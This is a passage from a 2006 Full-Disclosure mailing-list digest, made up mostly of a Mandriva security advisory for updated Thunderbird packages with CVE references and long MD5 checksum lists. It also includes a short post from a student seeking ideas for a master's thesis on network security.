>2007.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  0f2f7928b2edfbe0ae5faf127b0ed066  
>2007.0/x86_64/nsinstall-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e408368ca02e7efbbece9adbaaea7d56  
>2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
>  7867a124b85e4a8098ec7b814267c1f5  
>2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>  e776e0c4c5a6ff592af0c346bf8b4511  
>2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>
>  Corporate 3.0:
>  71192ef0a8bd28533718191d287d8158  
>corporate/3.0/i586/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.i586.rpm
>  c0121a4a0192d7944b1f8d30c977ab38  
>corporate/3.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.i586.rpm
>  53c403f48cb8547f0eb646ab1b41b656  
>corporate/3.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.i586.rpm
>  032ebcc12942292620b05929e0583f3a  
>corporate/3.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.i586.rpm
>  c88d6e26aa75dab433abcf71f2962e5c  
>corporate/3.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.i586.rpm
>  dcc54cb45829470f4267806696b46eca  
>corporate/3.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.i586.rpm
>  e7ba899422d7cbfd343659b810e4ee52  
>corporate/3.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.i586.rpm
>  d987b44bd201c2a23b404751e13df538  
>corporate/3.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.i586.rpm
>  9d496fa524a5226676f56ed87d2015ec  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.i586.rpm
>  eac64993c47963ede70eca5fb62e30b9  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.i586.rpm
>  b5523fcbf2370d1805e1f917faaa31c8  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.i586.rpm
>  1eb806fe5a429b52f010e16aeed4cb4a  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a8da00f3e4033ec813df4548072ac9f  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a2434c868a3b5799cb69c31d43f900c  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.i586.rpm
>  a1bb48121d53f83bf0efd303ea477b71  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
>  6f9d308c194ae42cfa0787afdebff2cc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.i586.rpm
>  bb3c3cf4056814131f8031471c81ac6f  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.i586.rpm
>  4228aaf098c501a80af97469393482b5  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a95ad54416e2f002d1aaa32557cf947  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.i586.rpm
>  19e1eac0351d89760ee31b4c9ee4fcc4  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.i586.rpm
>  1c21de0415bd0223237aa82795cc9600  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.i586.rpm
>  a11487e4145c294a57a77491f6996748  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.i586.rpm
>  31064002ac59d4857c3c45c3161580dc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.i586.rpm
>  fc88eeba422b084ffa67b77211248ef0  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.i586.rpm
>  4ead83e3405e7469370b4f02a9254ddc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a15b707a6d7f8e9b25c1ccaea023333  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a8c565fd3b42069b2e42103d98dfab2  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.i586.rpm
>  0040d479d7e55304c06df39b2233d12e  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.i586.rpm
>  6fab1321b377748e22a6709b772d5159  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.i586.rpm
>  1969ec5d6cc27df2f09f9733b5b37c6d  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
>  0c34a8e8bd3f9011283fe990771a857a  
>corporate/3.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.i586.rpm
>  68781ca20e2232457046bdab86b59462  
>corporate/3.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
>  37c3909b8feb9a35208519ccf4ec8a46  
>corporate/3.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.i586.rpm
>  ea2febd0e93d9348fd580452f7adc0be  
>corporate/3.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.i586.rpm
>  2eac2aaeb4fe209f98aa85505f6a9b87  
>corporate/3.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.i586.rpm
>  d8d8fc30075f0848859cbe96b26404a7  
>corporate/3.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.i586.rpm
>  3af19a8b01fb316451132e6460c7deb0  
>corporate/3.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.i586.rpm
>  f7aed893e50dff94f47d658d70093824  
>corporate/3.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.i586.rpm
>  ab6ead860edf6de4935aa3bb4ecf4721  
>corporate/3.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.i586.rpm
>  a9b0bc2b2bcf186b5a284cba3d6cad19  
>corporate/3.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.i586.rpm
>  373554b2032c20a61c48f4a4e11e5b57  
>corporate/3.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a2efc51627d9f55929e1b33e20f5274  
>corporate/3.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.i586.rpm
>  27ab1d70b317c477b56df8223a8477b4  
>corporate/3.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.i586.rpm
>  0bcd50b34bec84016747f4919b43b8e1  
>corporate/3.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.i586.rpm
>  4b26e1653ccf78604c16b25ed7357dfb  
>corporate/3.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.i586.rpm
>  ea1a0d0349f9a2f26b23c7678d7e5736  
>corporate/3.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.i586.rpm
>  7d7c13e7a820c069b3c657adf57443d9  
>corporate/3.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.i586.rpm
>  ef0755e523de702c802890f494ee5ea0  
>corporate/3.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.i586.rpm
>  f7618d53bff6c0764297f2352c5d0239  
>corporate/3.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
>  8df8db645153b5f7539044d5f892ad54  
>corporate/3.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.i586.rpm
>  d26cb2fbb5301bcf127ea4e4606f52b9  
>corporate/3.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.i586.rpm
>  f57d3dd11471a798542b87f0a3c68e82  
>corporate/3.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.i586.rpm
>  f3aede5440aeb78b59350fe56bb221d2  
>corporate/3.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.i586.rpm
>  bda7588d80565c17190fb407bdc3b1b2  
>corporate/3.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.i586.rpm
>  5f0764d5685d0836bd718fdc86b8a73a  
>corporate/3.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
>  2a1892c7e027dba761df43c98bb5e85f  
>corporate/3.0/i586/nsinstall-1.5.0.8-1.1.C30mdk.i586.rpm
>  04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  
>corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
>  98c5a4c000178cf57677fa6ee70adb71  
>corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  124ecce0dd9a26b565eef6c2f7e14401  
>corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>
>  Corporate 3.0/X86_64:
>  c109965ada094232d0958a8121be977a  
>corporate/3.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  e50d4054e85e4624b285067c75cfab18  
>corporate/3.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  f8cc5e4a36961ef4db2b8632fc6734d9  
>corporate/3.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  70e0a1878ce810ee835e7eca08a11e12  
>corporate/3.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  50abb11664ca02e6d77cbf30396e5398  
>corporate/3.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  5565876286c51872fb0ff90df059f052  
>corporate/3.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  cdd3892a5ba2a7c1ffe29d009e9d23a9  
>corporate/3.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ba3e7a92e79e00cd74b722ab94d832eb  
>corporate/3.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  c11927081645df376c72f27e8ebc6a85  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  448172b7c753b48c81b2a2c5d337b9e5  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  b83c0eb2158672f087fd5754ca27efad  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  49b91f3eae7a0773ecce62f635a6dfe9  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  3a0cf5325721e29c4eba9ee7cbc7efb7  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  cadf1aff1e915adb9e14539eb04521db  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  8218118b837bf05b3603652f0d4c5690  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  7c7190fc9ec1fc5774436ec7b0c92fd5  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  a42f63c64470ba933d6239bdf8b1569c  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  af8c5d7e3569278f3e9d364362be25b3  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  c749a5b7ac03ad98919f83425fcbd4c2  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ac82cd1f4fc0c5ed57be5b165cc65be4  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  0fbd67977bdfc1b1f9aa3c846c80c244  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4d26f0c7b32d3888e1e5c4c14516a4df  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  37fbc8358f1f11d5cb9f0e9b2fab3b26  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  6bec775a601e84be547246ae5638d059  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  0dc1c40ef6d1a233661048447db25543  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  7ec948cc8df84aae6b3d660bd4187208  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4b7ba48ffeff51709b26c8f315a4aaa1  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  94fceae9b7bc6d48fe2677eecaaf11a6  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d578499c38c981f2b8cc55fc1351efef  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  095291274be4a418d05c4e96cb441d90  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  272b554e86966e103d3e7f42b5cba9db  
>corporate/3.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  52bd52c4d5eaad6fa541dd20db5411d0  
>corporate/3.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  2536b28aa209a912ff74601db4e685b4  
>corporate/3.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  484ad35799b9a8cd277754bf1b13d686  
>corporate/3.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  42ff5a3a8320c4be3ffb1f1d74912f78  
>corporate/3.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  8a46a1d9f9380c205699ce090d749ff2  
>corporate/3.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  3c30c5aeee783bfabe34fb1ff7357d38  
>corporate/3.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  a90b14f77d6eed2228bfa55457803f6f  
>corporate/3.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  719239492f7d93b04f2c95902fccf94c  
>corporate/3.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  f52bcdf19f10745e756f0d58616126df  
>corporate/3.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  79826e403152cbe90ddf3bd4d8d64abe  
>corporate/3.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  18c08993c8f43c976be6cf2e8cfb2c35  
>corporate/3.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  b17866029fe4244a77af59fbb55a07b9  
>corporate/3.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  878f59fdb3ebb5929fc23437a17fb5ad  
>corporate/3.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d62fb25dc173e8b12be8623ae8fbf9bf  
>corporate/3.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  266322718c7cedd78e89524940f15d55  
>corporate/3.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  32c5fcab859aff66aaf704b997a1c625  
>corporate/3.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  17d7eeb0fbd25df1f76d5fa875ef7a3d  
>corporate/3.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4aabd47a35cb15547ccbe4eda1b521e8  
>corporate/3.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  1d8d27be2902605b0eae9dcbd89654cc  
>corporate/3.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  6c116048a69b3c176831fde5ff0a252a  
>corporate/3.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  e5bcb8518c5a61e63e62f90c363c67ae  
>corporate/3.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  5569afdd940d28bdf37a1003d5d5d6b0  
>corporate/3.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d00245da432be7a7d268846891555930  
>corporate/3.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ee130a70f9b1fe5719fea63963f3db6d  
>corporate/3.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  81f41bebeb9eca34d7c27ab81ca41af6  
>corporate/3.0/x86_64/nsinstall-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  
>corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
>  98c5a4c000178cf57677fa6ee70adb71  
>corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  124ecce0dd9a26b565eef6c2f7e14401  
>corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  _______________________________________________________________________
>
>  To upgrade automatically use MandrivaUpdate or urpmi.  The verification
>  of md5 checksums and GPG signatures is performed automatically for you.
>
>  All packages are signed by Mandriva for security.  You can obtain the
>  GPG public key of the Mandriva Security Team by executing:
>
>   gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
>  You can view other update advisories for Mandriva Linux at:
>
>   http://www.mandriva.com/security/advisories
>
>  If you want to report vulnerabilities, please contact
>
>   security_(at)_mandriva.com
>  _______________________________________________________________________
>
>  Type Bits/KeyID     Date       User ID
>  pub  1024D/22458A98 2000-07-10 Mandriva Security Team
>   
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.2.2 (GNU/Linux)
>
>iD8DBQFFU42GmqjQ0CJFipgRAiJgAKDQ8K7lgpOsNzXOQcSOrfcVrHQ4sACeLaqm
>75x+jP9FNzlE7ieAV3r7Czs=
>=DdKu
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 2
>Date: Fri, 15 Dec 2006 16:44:44 +0700
>From: "Fajar Edisya Putera" 
>Subject: [Full-disclosure] [OOT] Thesis for master degree
>To: full-disclosure at lists.grok.org.uk
>Message-ID:
>	<828af05c0612150144x5fac7141qee559e4d3abff5b2 at mail.gmail.com>
>Content-Type: text/plain; charset="iso-8859-1"
>
>Hello everyone, sorry for wasting your bandwidth
>
>I'm currently trying to find an interesting topic in computer networking
>security for my master degree thesis, I've read a lot of jurnal that 
>related
>with computer networking and security. All journal seem to advanced for me,
>sometimes the journal has mathematical formula that I don't understand what
>is the point for. Maybe someone here willing to help me? an idea? or 
>another
>journal website?
>
>Thanks
>Sincerely yours
>Fajar
>-------------- next part --------------
>An HTML attachment was scrubbed...
>URL: 
>http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061215/a50fe124/attachment-0001.html
>
>------------------------------
>
>Message: 3
>Date: Fri, 15 Dec 2006 16:10:34 -0700
>From: security at mandriva.com
>Subject: [Full-disclosure] [ MDKSA-2006:206 ] - Updated Thunderbird
>	packages	fix multiple vulnerabilities
>To: full-disclosure at lists.grok.org.uk
>Message-ID: 
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>  _______________________________________________________________________
>
>  Mandriva Linux Security Advisory                         MDKSA-2006:206
>  http://www.mandriva.com/security/
>  _______________________________________________________________________
>
>  Package : mozilla-thunderbird
>  Date    : November 9, 2006
>  Affected: 2007.0, Corporate 3.0
>  _______________________________________________________________________
>
>  Problem Description:
>
>  A number of security vulnerabilities have been discovered and corrected
>  in the latest Mozilla Thunderbird program, version 1.5.0.8.
>
>  This update provides the latest Thunderbird to correct these issues.
>  _______________________________________________________________________
>
>  References:
>
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748
>  http://www.mozilla.org/security/announce/2006/mfsa2006-65.html
>  http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
>  http://www.mozilla.org/security/announce/2006/mfsa2006-67.html
>  _______________________________________________________________________
>
>  Updated Packages:
>
>  Mandriva Linux 2007.0:
>  488e65dfe45ecf7e3a9e1a3dedd5c2ce  
>2007.0/i586/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.i586.rpm
>  5e551ab45061148722dda1d7ce66959e  
>2007.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2149a7fd629b8bc6843c6fdf1bb49efb  
>2007.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0d2315b490e3b8dd2ab791bd6c3ee516  
>2007.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
>  d5583d1b99b948c90e1cad62d753d67d  
>2007.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.i586.rpm
>  00ec607c39d3de4c589997d6c7ee6679  
>2007.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6d1f0f2576362a0bb90b4f9d8c4f2153  
>2007.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2cb0e44d2e3f7fddd60249843204403f  
>2007.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0c3c771882698d5651775aeed24bfd73  
>2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.i586.rpm
>  477ca905391c1d555d0136d46d557869  
>2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
>  741811dd392d942b27e1b3b0de695d4e  
>2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7c2c4922c6a2c6ce2cb6108a95f7dbfa  
>2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7cbf9f3218d587ef97edf01f2298096b  
>2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7dbd9e4c16db82a761a7b502c1f7f22d  
>2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b6dd6119216f6b748ee7c1570c3b8c37  
>2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1eea732e08ca0ef96796c3f50abb1f77  
>2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e1cc5cf2496581d776bb43e2f0dbbea6  
>2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  af86ce82ff9053250f82f2215c8dd7e5  
>2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6319633c561c7f68c6614685126da02b  
>2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.i586.rpm
>  56387829c6cc83882246e68e3b8704b0  
>2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
>  56cb838bb0c375f53d3cff2eb76a1118  
>2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
>  253500598ff56ab85394e68708ace21d  
>2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  53b4d4f1aa4e8174a33a0ed436ce961a  
>2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  fb9dd6933d27029538cd01a64ec55cee  
>2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.i586.rpm
>  701b9837303a3ed79e6c74c037c28926  
>2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b3739c1344770e92864c50f131f08884  
>2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1efe7ebc2a71e2f2d6c2785026a6e7ac  
>2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6860352b37999652aab785a266673e2f  
>2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  51abe323b14793097935b0c221e64f71  
>2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b8ec884437a460c9fbb5c71db6a46c31  
>2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  9ae4fb1871ee29f3f7b52210c0cf4e1b  
>2007.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e1a31b03ffef8e86df09579296fce3c9  
>2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6b4bdbb4648231b128655e56015621c7  
>2007.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  d333252ee1ba51351762e4050565ecb1  
>2007.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0a2828dbab70a2be0e721cc016f93d7f  
>2007.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  defa2ac291c66f693946362bd2501c40  
>2007.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.i586.rpm
>  c5540aa8289eefbf3e708e442de77aa8  
>2007.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  45da9968c4661ef994ef1dcefd0ad54f  
>2007.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.i586.rpm
>  df8d2ea1013a65457aa1f2100060d968  
>2007.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  f87f2441b2ca36d4f5c3f3f2dd04b3bb  
>2007.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.i586.rpm
>  bc3a281fbc5c09b7f962dfb1d3b9e517  
>2007.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2563050985477697472069d08e96de0f  
>2007.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e22be985ae58ab3eba5b90aa6a3eb58e  
>2007.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.i586.rpm
>  fde0d1b9c4feee3c1e239345f4065090  
>2007.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  10be2386887a6c70bc4f9c0453b33072  
